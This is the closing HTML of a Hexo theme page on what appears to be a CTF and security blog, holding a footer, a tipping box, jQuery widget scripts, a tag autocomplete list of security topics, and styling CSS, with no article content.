        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>
</div>





    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2016-2019 Yelog</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="//cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min.js"></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#WP','#python','#javascript','#比赛回顾','#LSB','#MISC','#隐写','#工具','#渗透测试','#mysql load data','#SQL','#SSTI','#redis','#ssrf','#Xdebuf','#ctf','#RSA','#xxe','#docker','#serialize','#php','#弱类型','#命令执行','#zip','#misc','#哈希长度扩展攻击',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("http://wx3.sinaimg.cn/mw690/006boCb9ly1g5kej6ap1bj31hc0u0wn6.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
